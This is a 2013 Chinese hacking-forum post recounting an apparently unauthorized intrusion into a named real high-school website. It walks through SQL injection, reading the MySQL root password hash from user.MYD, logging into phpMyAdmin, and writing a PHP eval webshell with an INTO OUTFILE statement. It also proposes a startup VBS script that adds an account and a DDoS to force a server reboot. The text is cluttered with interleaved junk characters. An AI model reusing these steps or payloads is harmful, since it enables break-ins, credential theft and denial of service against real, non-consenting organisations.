找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2734|回复: 1
打印 上一主题 下一主题

友情检测湖北省大治市第一中学

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:32:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏
$ @! h+ _% {: x7 \$ o发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入!8 ]; u8 f' [- _, Z" e/ S5 p

# ?  E+ n' z+ y
; j  b+ W$ @) x/ ?( H
2 G! R2 t! ?$ ^, J; A( ]常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 + z4 c9 }" }" ?) p
0 |- u* ]' c6 N; j: f# Y$ t
那么想可以直接写入shell ,getshell有几个条件:" j+ n4 Q* p: Y! |2 ]# i
1、知道站点物理路径
2、有足够大的权限
3、magic_quotes_gpc()=OFF
7 g! ]8 d8 O% }- i5 ?$ h
% p$ k" J# V, w+ w! u- x试着爆绝对路径:
2 m5 {5 F9 O/ ?& ~; h: y9 ~. m1./phpMyAdmin/index.php?lang[]=1  
& k8 c1 u1 c. ^# K0 s- _2./phpMyAdmin/phpinfo.php  ( c0 H" w" w; J% T8 W* ~. x0 p
3./load_file()  
9 A5 T' \: S6 g( j1 L1 U+ Z+ I4./phpmyadmin/themes/darkblue_orange/layout.inc.php  1 x6 B5 v- i/ M5 s: F+ }
5./phpmyadmin/libraries/select_lang.lib.php  
4 K) y* x- U1 |! u% b6./phpmyadmin/libraries/lect_lang.lib.php  , c( _4 K4 o+ h, p2 e
7./phpmyadmin/libraries/mcrypt.lib.php     t. {. R" X* J0 d- i9 @6 [% c5 ^
8./phpmyadmin/libraries/export/xls.php  
0 {2 \) t( c! d1 m# x- q) }
6 M2 W; n7 p+ I& o均不行...........................% ~% ?7 e/ ]! Y; B; B4 f3 r& {

5 j' r6 x8 }$ ]. u3 l御剑扫到这个:http://www.dyyz.net.cn//phpinfo.php       获得网站路径:D:/www/phpinfo.php& o- h3 h! ]; y' z9 j  M

2 S/ z0 W5 u% j权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin 0 r5 M; S/ x* Y( _

" z0 O: X# Z0 R6 s$ ~) Z默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败2 A6 k3 Q+ T- t1 Y" o, N" F: |& E! z

7 ?* k! H9 X+ ~. ?+ z敏感东西:http://202.103.49.66/Admincp.php  社工进不去.........../ R' z6 ?) f& j4 ]# f

" l; Q+ @* r/ D: s, o4 n( {想想root还可以读,读到root密码进phpmyadmin 也可以拿shell ! Y! x& N" [! F' X+ t, Z
8 p* U; c& E! p; o+ f1 q
http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini
! A( k* ], y- _) P; [/ f% L
# m: j$ y5 {5 D8 B自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD ! N& ~5 C/ U4 p
3 B$ c3 ^, T  u# T' p/ r
成功读到root密码:1 I6 }% W! t' P' G
; Q$ }& |5 G. |5 ~5 O
17---- r(0072)
# z9 G2 h" \" a7 T6 J18---- o(006f)
0 O. c$ X* k8 B" p: [19---- o(006f)! `( F1 P8 F' y' j( F
20---- t(0074)
. l1 e$ h* N% z2 b5 s* a7 p21---- *(002a)% j4 ?  D. G# X. P
22---- 8(0038)8 p, A6 r; Z* x9 b3 ~
23---- 2(0032)
& i0 Q* D: _& Q24---- E(0045)
% A* `+ {+ p8 ^9 u; S9 t25---- 1(0031)
: i  g7 {' p! v1 I3 x26---- C(0043)
% z* i; Z7 {6 R( b  |27---- 5(0035)4 O# d1 s& c8 f0 Q3 G: ^/ w0 B
28---- 8(0038); g6 K" N$ C. @: `% M
29---- 2(0032)7 j; F( E6 d0 F
30---- 8(0038)( G! s9 f! U) f) B% g* V
31---- A(0041)
4 A, ^0 N3 i3 ?" M% T) K5 u6 i, `32---- 9(0039)* _) P; p! a- `( I7 G+ f' S6 X
33---- B(0042)
" G3 S- K' [. w4 j: ?34---- 5(0035)5 L7 B# p3 Y7 T, ]$ P
35---- 4(0034)
& q5 O" S3 e8 D- t36---- 8(0038)0 J% H2 `+ o% a4 j0 E
37---- 6(0036)
: B* p+ E: q  N3 u2 r38---- 4(0034)
  m; f" S& N8 m. ~' G  s& C' b" \39---- 9(0039)! E6 l/ x0 }* y1 [
40---- 1(0031); J  c$ X6 O0 M+ v$ G. s7 b1 u8 t
41---- 1(0031)$ f8 k! V- ~8 [* C$ F* K/ c
42---- 5(0035)5 B5 q+ \! H1 b
43---- 3(0033)! P- |* Y6 j- {' e% t% L
44---- 5(0035)
" j5 ?) i1 ^2 U& A8 U6 M45---- 9(0039)
/ c- U+ k) j4 L8 x! t( E46---- 8(0038)
2 W* u+ K% B) |! x% o# p47---- F(0046)
/ }+ c$ z; w7 ^: z48---- F(0046)
6 C5 D. E, @6 C9 R1 P! j49---- 4(0034)/ U  g0 w& A" `/ O& q
50---- F(0046)
2 l6 W- L7 _$ g4 j0 k. F51---- 0(0030)+ i7 E) E' F7 u8 Y' p* D3 h  t; s
52---- 3(0033)$ g6 n' U" z  ]' W( B7 o+ l% A
53---- 2(0032)1 S$ O0 {2 ]0 h& L9 E* h/ ]# a" ~
54---- A(0041)) _  \% F# v  x' [" ]: U
55---- 4(0034)
) ^: j  F1 A8 n: E. L+ _" `56---- A(0041): R6 |0 c! I& M9 t2 b
57---- B(0042)
/ D# `' x% N2 F6 E7 l" J7 x58---- *(0044)0 z" n& G. E+ Q
59---- *(0035)! ]6 O3 e2 q- b: G! J" U
60---- *(0041)
) j" h9 U4 q( p" U: k. Y$ q61---- *0032)
0 }& K' c$ Z; M2 m" F1 L7 I- q' |7 H) x
解密后成功登陆phpmyamin
( _7 P9 H9 G2 }                          
2 i+ _0 @0 {! q/ |( U- V# T' w
5 p9 w& }/ k9 i6 P) I4 G& Y                             
# k0 q/ E# ]/ v! E" Q  C1 ?- h% F* L: ?/ o0 n& q4 v+ W" ?% g0 M
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'  }7 o+ W( l3 j/ J

1 `8 w1 C, y/ _3 g7 i' y6 Z成功执行,拿下shell,菜刀连接:
: V4 i# i( Y4 @& k  ^4 @1 @) Q5 i
服务器不支持asp,aspx,php提权无果...................
+ M+ w! C5 l7 U* @
; ?$ A9 e* R7 A% x* A2 y但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
2 e3 W5 }1 L5 J% W2 @/ G
服务器上已经有个隐藏帐号了

5 v1 O$ F5 x& I1 X4 [
别名     administrators
- V6 V+ H& B( V: {注释     管理员对计算机/域有不受限制的完全访问权
( k: G+ V+ \: T9 t+ G8 g
成员
& ^1 O/ Y0 H% _1 ^$ G5 E& q9 X* [
-------------------------------------------------------------------------------: X" ~# z1 L% y( v
admin
% Z/ J' P( u/ }9 b+ `% YAdministrator
# ]" s" |# v. Y3 T: P- o( lslipper$
+ p0 `( S3 ^; D0 ~8 Z8 h4 A  e8 Fsqluser
, u! R) p2 ~3 [1 ]  i* n& L命令成功完成。
8 k& o7 a# j0 |& Y' V% p% f9 h( u  P* y4 ^0 C; U
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
8 }% W$ d9 G- \! F9 f* @) C. z3 y
ddos服务器重启,不然就只能坐等服务器重启了...............................  v, ~0 \# k3 ~* A" S/ [
6 ?$ I6 K" ]' p' O3 [
      
& K' c7 ^6 t' h/ b/ d

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2013-5-20 15:28:12 | 只看该作者
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表